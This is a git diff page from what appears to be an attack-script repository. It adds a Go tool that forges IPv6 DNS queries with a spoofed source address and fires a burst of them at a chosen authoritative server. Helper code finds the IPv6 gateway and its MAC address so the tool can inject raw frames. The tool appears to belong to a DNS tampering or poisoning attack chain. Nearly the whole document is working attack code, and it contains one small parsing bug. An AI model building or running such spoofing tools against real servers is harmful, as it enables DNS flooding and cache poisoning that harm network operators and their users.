summaryrefslogtreecommitdiff
path: root/att script/5_v6_篡改/code/src/flood
diff options
context:
space:
mode:
Diffstat (limited to 'att script/5_v6_篡改/code/src/flood')
-rw-r--r--att script/5_v6_篡改/code/src/flood/go.mod20
-rw-r--r--att script/5_v6_篡改/code/src/flood/go.sum38
-rw-r--r--att script/5_v6_篡改/code/src/flood/ipv6util.go103
-rw-r--r--att script/5_v6_篡改/code/src/flood/main.go192
4 files changed, 353 insertions, 0 deletions
diff --git a/att script/5_v6_篡改/code/src/flood/go.mod b/att script/5_v6_篡改/code/src/flood/go.mod
new file mode 100644
index 0000000..b55b38b
--- /dev/null
+++ b/att script/5_v6_篡改/code/src/flood/go.mod
@@ -0,0 +1,20 @@
+module flood
+
+go 1.21
+
+toolchain go1.21.4
+
+require (
+ github.com/google/gopacket v1.1.19
+ github.com/jackpal/gateway v1.0.13
+)
+
+require (
+ github.com/davecgh/go-spew v1.1.1 // indirect
+ github.com/pmezard/go-difflib v1.0.0 // indirect
+ github.com/stretchr/objx v0.5.0 // indirect
+ github.com/stretchr/testify v1.8.4 // indirect
+ golang.org/x/net v0.17.0 // indirect
+ golang.org/x/sys v0.13.0 // indirect
+ gopkg.in/yaml.v3 v3.0.1 // indirect
+)
diff --git a/att script/5_v6_篡改/code/src/flood/go.sum b/att script/5_v6_篡改/code/src/flood/go.sum
new file mode 100644
index 0000000..1cca74c
--- /dev/null
+++ b/att script/5_v6_篡改/code/src/flood/go.sum
@@ -0,0 +1,38 @@
+github.com/davecgh/go-spew v1.1.0/go.mod h1:J7Y8YcW2NihsgmVo/mv3lAwl/skON4iLHjSsI+c5H38=
+github.com/davecgh/go-spew v1.1.1 h1:vj9j/u1bqnvCEfJOwUhtlOARqs3+rkHYY13jYWTU97c=
+github.com/davecgh/go-spew v1.1.1/go.mod h1:J7Y8YcW2NihsgmVo/mv3lAwl/skON4iLHjSsI+c5H38=
+github.com/google/gopacket v1.1.19 h1:ves8RnFZPGiFnTS0uPQStjwru6uO6h+nlr9j6fL7kF8=
+github.com/google/gopacket v1.1.19/go.mod h1:iJ8V8n6KS+z2U1A8pUwu8bW5SyEMkXJB8Yo/Vo+TKTo=
+github.com/jackpal/gateway v1.0.13 h1:fJccMvawxx0k7S1q7Fy/SXFE0R3hMXkMuw8y9SofWAk=
+github.com/jackpal/gateway v1.0.13/go.mod h1:6c8LjW+FVESFmwxaXySkt7fU98Yv806ADS3OY6Cvh2U=
+github.com/pmezard/go-difflib v1.0.0 h1:4DBwDE0NGyQoBHbLQYPwSUPoCMWR5BEzIk/f1lZbAQM=
+github.com/pmezard/go-difflib v1.0.0/go.mod h1:iKH77koFhYxTK1pcRnkKkqfTogsbg7gZNVY4sRDYZ/4=
+github.com/stretchr/objx v0.1.0/go.mod h1:HFkY916IF+rwdDfMAkV7OtwuqBVzrE8GR6GFx+wExME=
+github.com/stretchr/objx v0.4.0/go.mod h1:YvHI0jy2hoMjB+UWwv71VJQ9isScKT/TqJzVSSt89Yw=
+github.com/stretchr/objx v0.5.0 h1:1zr/of2m5FGMsad5YfcqgdqdWrIhu+EBEJRhR1U7z/c=
+github.com/stretchr/objx v0.5.0/go.mod h1:Yh+to48EsGEfYuaHDzXPcE3xhTkx73EhmCGUpEOglKo=
+github.com/stretchr/testify v1.7.1/go.mod h1:6Fq8oRcR53rry900zMqJjRRixrwX3KX962/h/Wwjteg=
+github.com/stretchr/testify v1.8.0/go.mod h1:yNjHg4UonilssWZ8iaSj1OCr/vHnekPRkoO+kdMU+MU=
+github.com/stretchr/testify v1.8.4 h1:CcVxjf3Q8PM0mHUKJCdn+eZZtm5yQwehR5yeSVQQcUk=
+github.com/stretchr/testify v1.8.4/go.mod h1:sz/lmYIOXD/1dqDmKjjqLyZ2RngseejIcXlSw2iwfAo=
+golang.org/x/crypto v0.0.0-20190308221718-c2843e01d9a2/go.mod h1:djNgcEr1/C05ACkg1iLfiJU5Ep61QUkGW8qpdssI0+w=
+golang.org/x/crypto v0.0.0-20191011191535-87dc89f01550/go.mod h1:yigFU9vqHzYiE8UmvKecakEJjdnWj3jj499lnFckfCI=
+golang.org/x/lint v0.0.0-20200302205851-738671d3881b/go.mod h1:3xt1FjdF8hUf6vQPIChWIBhFzV8gjjsPE/fR3IyQdNY=
+golang.org/x/mod v0.1.1-0.20191105210325-c90efee705ee/go.mod h1:QqPTAvyqsEbceGzBzNggFXnrqF1CaUcvgkdR5Ot7KZg=
+golang.org/x/net v0.0.0-20190404232315-eb5bcb51f2a3/go.mod h1:t9HGtf8HONx5eT2rtn7q6eTqICYqUVnKs3thJo3Qplg=
+golang.org/x/net v0.0.0-20190620200207-3b0461eec859/go.mod h1:z5CRVTTTmAJ677TzLLGU+0bjPO0LkuOLi4/5GtJWs/s=
+golang.org/x/net v0.17.0 h1:pVaXccu2ozPjCXewfr1S7xza/zcXTity9cCdXQYSjIM=
+golang.org/x/net v0.17.0/go.mod h1:NxSsAGuq816PNPmqtQdLE42eU2Fs7NoRIZrHJAlaCOE=
+golang.org/x/sync v0.0.0-20190423024810-112230192c58/go.mod h1:RxMgew5VJxzue5/jJTE5uejpjVlOe/izrB70Jof72aM=
+golang.org/x/sys v0.0.0-20190215142949-d0b11bdaac8a/go.mod h1:STP8DvDyc/dI5b8T5hshtkjS+E42TnysNCUPdjciGhY=
+golang.org/x/sys v0.0.0-20190412213103-97732733099d/go.mod h1:h1NjWce9XRLGQEsW7wpKNCjG9DtNlClVuFLEZdDNbEs=
+golang.org/x/sys v0.13.0 h1:Af8nKPmuFypiUBjVoU9V20FiaFXOcuZI21p0ycVYYGE=
+golang.org/x/sys v0.13.0/go.mod h1:oPkhp1MJrh7nUepCBck5+mAzfO9JrbApNNgaTdGDITg=
+golang.org/x/text v0.3.0/go.mod h1:NqM8EUOU14njkJ3fqMW+pc6Ldnwhi/IjpwHt7yyuwOQ=
+golang.org/x/tools v0.0.0-20200130002326-2f3ba24bd6e7/go.mod h1:TB2adYChydJhpapKDTa4BR/hXlZSLoq2Wpct/0txZ28=
+golang.org/x/xerrors v0.0.0-20191011141410-1b5146add898/go.mod h1:I/5z698sn9Ka8TeJc9MKroUUfqBBauWjQqLJ2OPfmY0=
+gopkg.in/check.v1 v0.0.0-20161208181325-20d25e280405 h1:yhCVgyC4o1eVCa2tZl7eS0r+SDo693bJlVdllGtEeKM=
+gopkg.in/check.v1 v0.0.0-20161208181325-20d25e280405/go.mod h1:Co6ibVJAznAaIkqp8huTwlJQCZ016jof/cbN4VW5Yz0=
+gopkg.in/yaml.v3 v3.0.0-20200313102051-9f266ea9e77c/go.mod h1:K4uyk7z7BCEPqu6E+C64Yfv1cQ7kz7rIZviUmN+EgEM=
+gopkg.in/yaml.v3 v3.0.1 h1:fxVm/GzAzEWqLHuvctI91KS9hhNmmWOoWu0XTYJS7CA=
+gopkg.in/yaml.v3 v3.0.1/go.mod h1:K4uyk7z7BCEPqu6E+C64Yfv1cQ7kz7rIZviUmN+EgEM=
diff --git a/att script/5_v6_篡改/code/src/flood/ipv6util.go b/att script/5_v6_篡改/code/src/flood/ipv6util.go
new file mode 100644
index 0000000..09245d3
--- /dev/null
+++ b/att script/5_v6_篡改/code/src/flood/ipv6util.go
@@ -0,0 +1,103 @@
+package main
+
+import (
+ "encoding/hex"
+ "fmt"
+ "net"
+ "os/exec"
+ "strings"
+ "syscall"
+ "unsafe"
+)
+
+type router struct {
+ ifaces []net.Interface
+ addrs []net.IP
+ v6 routeSlice
+}
+type routeSlice []*rtInfo
+
+type rtInfo struct {
+ // Dst net.IPNet
+ Gateway, PrefSrc net.IP
+ OutputIface uint32
+ Priority uint32
+}
+
+func getv6Gateway() (net.IP, error) {
+ rtr := &router{}
+
+ tab, err := syscall.NetlinkRIB(syscall.RTM_GETROUTE, syscall.AF_INET6)
+ if err != nil {
+ return nil, err
+ }
+
+ msgs, err := syscall.ParseNetlinkMessage(tab)
+ if err != nil {
+ return nil, err
+ }
+
+ for _, m := range msgs {
+ switch m.Header.Type {
+ case syscall.NLMSG_DONE:
+ break
+ case syscall.RTM_NEWROUTE:
+ // rtmsg := (*syscall.RtMsg)(unsafe.Pointer(&m.Data[0]))
+ attrs, err := syscall.ParseNetlinkRouteAttr(&m)
+ if err != nil {
+ return nil, err
+ }
+ routeInfo := rtInfo{}
+ rtr.v6 = append(rtr.v6, &routeInfo)
+ for _, attr := range attrs {
+ switch attr.Attr.Type {
+ // case syscall.RTA_DST:
+ // routeInfo.Dst.IP = net.IP(attr.Value)
+ // routeInfo.Dst.Mask = net.CIDRMask(int(rtmsg.Dst_len), len(attr.Value)*8)
+ case syscall.RTA_GATEWAY:
+ routeInfo.Gateway = net.IP(attr.Value)
+ case syscall.RTA_OIF:
+ routeInfo.OutputIface = *(*uint32)(unsafe.Pointer(&attr.Value[0]))
+ case syscall.RTA_PRIORITY:
+ routeInfo.Priority = *(*uint32)(unsafe.Pointer(&attr.Value[0]))
+ case syscall.RTA_PREFSRC:
+ routeInfo.PrefSrc = net.IP(attr.Value)
+ }
+ }
+ }
+ }
+ ips := []net.IP{}
+ for _, rt := range rtr.v6 {
+ if rt.Gateway != nil {
+ ips = append(ips, rt.Gateway)
+ }
+ }
+ return ips[0], nil
+}
+
+func getGatewayV6Mac(ifacename string, gwIP net.IP) (net.HardwareAddr, error) {
+ if debugOutput {
+ println("邻居发现--使用网卡接口为:" + ifacename)
+ }
+ out, err := exec.Command("ip", "-6", "neighbor", "show", "dev", ifacename).Output()
+ if err != nil {
+ println(err.Error())
+ } else {
+ outlines := strings.Split(string(out), "/n")
+ for _, line := range outlines {
+ linelist := strings.Split(line, " ")
+ // 与网关对应的MAC地址
+ if linelist[0] == gwIP.String() {
+
+ maclist := strings.Split(linelist[2], ":")
+ var macbyte []byte
+ for _, m := range maclist {
+ b, _ := hex.DecodeString(m)
+ macbyte = append(macbyte, b[0])
+ }
+ return net.HardwareAddr(macbyte), nil
+ }
+ }
+ }
+ return nil, fmt.Errorf("无法找到网关" + gwIP.String() + "对应的MAC地址")
+}
diff --git a/att script/5_v6_篡改/code/src/flood/main.go b/att script/5_v6_篡改/code/src/flood/main.go
new file mode 100644
index 0000000..be0f1b4
--- /dev/null
+++ b/att script/5_v6_篡改/code/src/flood/main.go
@@ -0,0 +1,192 @@
+package main
+
+import (
+ "errors"
+ "flag"
+ "fmt"
+ "math/rand"
+ "net"
+ "os"
+ "strconv"
+
+ "github.com/google/gopacket"
+ "github.com/google/gopacket/layers"
+ "github.com/google/gopacket/pcap"
+)
+
+// 各层的定义
+var ethernetLayer *layers.Ethernet
+var debugOutput = false
+var handle *pcap.Handle
+var repeatTime = 100
+
+func main() {
+ // 读取参数配置
+ ifaceNameArg := flag.String("i", "vmnet1", "用于发送查询包的网络端口")
+ sourceaddrArg := flag.String("saddr", "", "伪造报文的源地址")
+ targetaddrArg := flag.String("taddr", "", "目标权威的地址")
+ qnameArg := flag.String("q", "www.baidu.com.", "请求查询的域名")
+ debugOutputArg := flag.Bool("d", false, "debug模式输出")
+ flag.Parse()
+
+ // 指针->值
+ ifaceName := *ifaceNameArg
+ sourceaddr := *sourceaddrArg
+ targetaddr := *targetaddrArg
+ qname := *qnameArg
+ debugOutput = *debugOutputArg
+ defer os.Exit(0)
+
+ handle, _ = pcap.OpenLive(
+ ifaceName,
+ 65536,
+ true,
+ pcap.BlockForever,
+ )
+
+ // 构造MAC层
+ var srcmac net.HardwareAddr
+ var dstmac net.HardwareAddr
+ if ifaceName == "" {
+ ifaceName = "eth0"
+ }
+
+ // 源MAC
+ loiface, err := net.InterfaceByName(ifaceName)
+ if err != nil {
+ fmt.Println(err.Error())
+ }
+ srcmac = loiface.HardwareAddr
+ if debugOutput {
+ fmt.Println("源MAC地址为: " + srcmac.String())
+ }
+
+ // 目的MAC
+ // 获取网关地址
+ gwIP, _ := getv6Gateway()
+ fmt.Println("网关IPv6地址为:" + gwIP.String())
+ dstmac, err = GetGatewayIPv6Addr(loiface, gwIP)
+ if err != nil {
+ fmt.Println(err.Error())
+ }
+ if debugOutput {
+ fmt.Println("目的MAC地址为: " + dstmac.String())
+ }
+
+ // mac层包
+ ethernetLayer = &layers.Ethernet{
+ SrcMAC: srcmac,
+ DstMAC: dstmac,
+ EthernetType: layers.EthernetTypeIPv6,
+ }
+
+ // dns查询
+ for i := 0; i < repeatTime; i++ {
+ go sendDNSRequest(uint16(rand.Uint32()), qname, net.ParseIP(sourceaddr), net.ParseIP(targetaddr))
+ }
+ if debugOutput {
+ fmt.Println("已连续发送" + strconv.Itoa(repeatTime) + "个请求包到" + targetaddr)
+ }
+}
+
+func Send(handle *pcap.Handle, l ...gopacket.SerializableLayer) error {
+ opts := gopacket.SerializeOptions{
+ FixLengths: true,
+ ComputeChecksums: true,
+ }
+ buffer := gopacket.NewSerializeBuffer()
+ if err := gopacket.SerializeLayers(buffer, opts, l...); err != nil {
+ return err
+ }
+ err := handle.WritePacketData(buffer.Bytes())
+ if err != nil {
+ println(err.Error())
+ }
+ return nil
+}
+
+func GetIfaceAddr(iface *net.Interface) (net.IP, error) {
+ addrs, err := iface.Addrs()
+ if err != nil {
+ return nil, errors.New("can not get ip address")
+ }
+
+ var srcIP net.IP
+ for _, address := range addrs {
+ if ipnet, ok := address.(*net.IPNet); ok && !ipnet.IP.IsLoopback() {
+ if ipnet.IP.To16() != nil {
+ srcIP = ipnet.IP.To16()
+ break
+ }
+ }
+ }
+
+ if srcIP == nil {
+ return nil, errors.New("can not get ip address")
+ }
+
+ return srcIP, nil
+}
+
+func GetGatewayIPv6Addr(iface *net.Interface, gatewayIP net.IP) (net.HardwareAddr, error) {
+ gwMAC, err := getGatewayV6Mac(iface.Name, gatewayIP)
+ if err != nil {
+ fmt.Println(err.Error())
+ panic("")
+ }
+ return gwMAC, nil
+}
+
+func sendDNSRequest(id uint16, name string, resolverIP net.IP, authIP net.IP) {
+ if debugOutput {
+ fmt.Println("Send new DNS request", name, id, resolverIP.String(), authIP.String())
+ }
+ _sendDNSRequest(id, name, resolverIP, authIP, (layers.UDPPort)(rand.Uint32()), 53)
+}
+
+func _sendDNSRequest(id uint16, name string, src net.IP, dst net.IP, sport layers.UDPPort, dport layers.UDPPort) {
+ ipLayer := layers.IPv6{
+ FlowLabel: 1,
+ SrcIP: src,
+ DstIP: dst,
+ Version: 6,
+ HopLimit: 64,
+ NextHeader: layers.IPProtocolUDP,
+ //Flags: layers.IPv4DontFragment,
+ }
+ udpLayer := layers.UDP{
+ SrcPort: sport,
+ DstPort: dport,
+ }
+ dnsLayer := layers.DNS{
+ ID: id,
+ QR: false,
+ OpCode: 0,
+ AA: false,
+ TC: false,
+ RD: true,
+ RA: false,
+ Z: 0,
+ ResponseCode: 0,
+ QDCount: 1,
+ ANCount: 0,
+ NSCount: 0,
+ ARCount: 0,
+ Questions: []layers.DNSQuestion{{
+ Name: []byte(name),
+ Type: layers.DNSTypeAAAA,
+ Class: layers.DNSClassIN,
+ }},
+ Authorities: nil,
+ Additionals: nil,
+ }
+
+ err := udpLayer.SetNetworkLayerForChecksum(&ipLayer)
+ if err != nil {
+ fmt.Println("udpLayer.SetNetworkLayerForChecksum @ dns.go pos 0 error", err)
+ }
+ err = Send(handle, ethernetLayer, &ipLayer, &udpLayer, &dnsLayer)
+ if err != nil {
+ fmt.Println("can not send packet @ sendDNSRequest: ", err)
+ }
+}
generated by cgit v1.2.3 (git 2.39.1) at 2025-12-30 16:02:54 +0000